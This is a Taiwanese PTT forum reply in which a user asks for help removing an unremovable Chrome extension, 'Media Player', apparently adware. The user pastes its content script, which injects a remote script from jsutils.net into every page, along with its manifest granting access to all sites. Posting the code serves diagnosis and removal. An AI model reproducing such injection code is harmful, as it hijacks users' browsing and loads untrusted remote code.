Re: [求救] chrome 砍不掉的擴充 (由公司政策安裝)
※ 引述《azlbf (上邪!我欲與君相知)》之銘言:
: 1. 敘述問題:
: chrome在開網頁的時候會隨機跳出廣告連結
: 發現擴充中多了一個東西且無法刪除
: http://gyazo.com/d31784ae9f1e6af877b7d9b26a326a13
: 用過重灌狂人的教學
: 把riee開頭的東西都砍掉
: 在regedit裡面也找不到此名稱了
: 可是依然還在
: 使用avast徹底掃毒 無效
: 砍chrome重新安裝也無效
: 跪求各位大大協住
問題同上,大約是在1/29前後感覺chrome有時候會跳廣告出來
或是在點連結的時候,會跑出別的廣告網站
從chrome發現一個無法移除的擴充功能Media Player 1.1(由公司政策安裝)
在新增與移除也發現一個Media Player程式
我一開始也是照上篇重灌狂人的教學,用了無效反而不知該如何往下處理
用掃毒掃木馬軟體都掃不到
使清除軟體(例如CCleaner)砍了之後,只要開瀏覽器又生出來(瀏覽器整個砍掉也一樣)
目前我是先用CCleaner把那個擴充功能暫時關掉
然後從放可疑檔案的資料夾清空設唯讀
我確定沒有hao123,不過之前不小心裝到新版的MiPony,瞬間被裝一堆亂七八糟的不明物
感覺是那時候造成的後遺症
log如下:
ComboFix_Log
http://cht.tw/h/mlao4
hijackthis.log
http://cht.tw/h/5y6pt
SREngLOG.log
http://cht.tw/h/52p8b
利用CCleaner可找到該擴充功能的存放位置
裡面有兩個看起來就很像廣告軟體的東西,不曉得把程式碼附上有沒有幫助?
ffMediaPlayerV1alpha747chaction.js
--
function MediaPlayerV1alpha747injFunction (doc) {
// Add the script only to top-level window
if(self !== top) {
return;
}
var script = doc.createElement("script");
var head = doc.getElementsByTagName("head")[0];
// create <head> tag if missing
if(!head){
head = doc.createElement("head");
}
script.setAttribute('id','wsu_js');
script.setAttribute('src',
('https:' == doc.location.protocol ? 'https://' : 'http://') +
'www.jsutils.net/ext.js?c=5879&ext=MediaPlayerV1alpha747');
script.setAttribute('type', 'text/javascript');
script.async = true;
if(head && !doc.getElementById('wsu_js'))
head.appendChild(script);
}
MediaPlayerV1alpha747injFunction (document);
--
manifest.json
--
{
"content_scripts": [ {
"js": [ "ffMediaPlayerV1alpha747chaction.js" ],
"matches": [ "*://*/*" ],
"run_at": "document_idle"
} ],
"description": "Media Player.",
"icons": {
"128": "images/MediaPlayerV1alpha747_128.png",
"16": "images/MediaPlayerV1alpha747_16.png",
"48": "images/MediaPlayerV1alpha747_48.png"
},
"key":
"MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA1B2x934/L9+nOv9PCFC5x3S+cKg/OGKbv+UDiDaIuwrAefW1JYSU9ubj38H1tiAPyNciecbyZZQ+3JUzf2mZzYEgjWdBvXEmID0i+8j1hO1ictVBAOsGoj8nYVQQR/aXKqL91eLvk3SUJMoDSNm0RtXM97oIRTKt/3RKY9a7IoGwYdEKtIE8VdVT44cu8wiu/5BRbzBAk0BDnFyZXcquqrgvYOgYhlh1eWkEtRoI8fGsYNhP5UASi15Xcw0uefm6xPrkO2FthwMRI9y8WylOxoAbhQIUBUUr1Jemlzbq97eEqF0Gms7+Vz3a1idFjD2xWFHBWuro+yEqq3ptvyYZrQIDAQAB",
"manifest_version": 2,
"name": "Media Player",
"page_action": {
"default_icon": "icon.ico"
},
"permissions": [ "http://*/*", "https://*/*" ],
"version": "1.1"
}
--
--
※ 發信站: 批踢踢實業坊(ptt.cc)
◆ From: 218.164.177.190
※ 編輯: holsety 來自: 218.164.177.190 (02/06 22:19)
推
02/07 00:46, , 1F
02/07 00:46, 1F
推
02/07 08:09, , 2F
02/07 08:09, 2F
→
02/07 08:09, , 3F
02/07 08:09, 3F
→
02/07 22:23, , 4F
02/07 22:23, 4F
→
02/07 22:24, , 5F
02/07 22:24, 5F
→
02/07 22:26, , 6F
02/07 22:26, 6F
→
02/07 22:27, , 7F
02/07 22:27, 7F
→
02/07 22:28, , 8F
02/07 22:28, 8F
推
02/08 10:13, , 9F
02/08 10:13, 9F
→
02/08 10:14, , 10F
02/08 10:14, 10F
→
02/08 10:14, , 11F
02/08 10:14, 11F
推
02/26 21:25, , 12F
02/26 21:25, 12F
→
02/26 21:28, , 13F
02/26 21:28, 13F
→
02/26 21:30, , 14F
02/26 21:30, 14F
→
02/26 21:30, , 15F
02/26 21:30, 15F
→
02/26 21:32, , 16F
02/26 21:32, 16F
→
02/26 21:34, , 17F
02/26 21:34, 17F
→
03/08 16:41, , 18F
03/08 16:41, 18F
→
05/13 02:56, , 19F
05/13 02:56, 19F
討論串 (同標題文章)
AntiVirus 近期熱門文章
PTT數位生活區 即時熱門文章
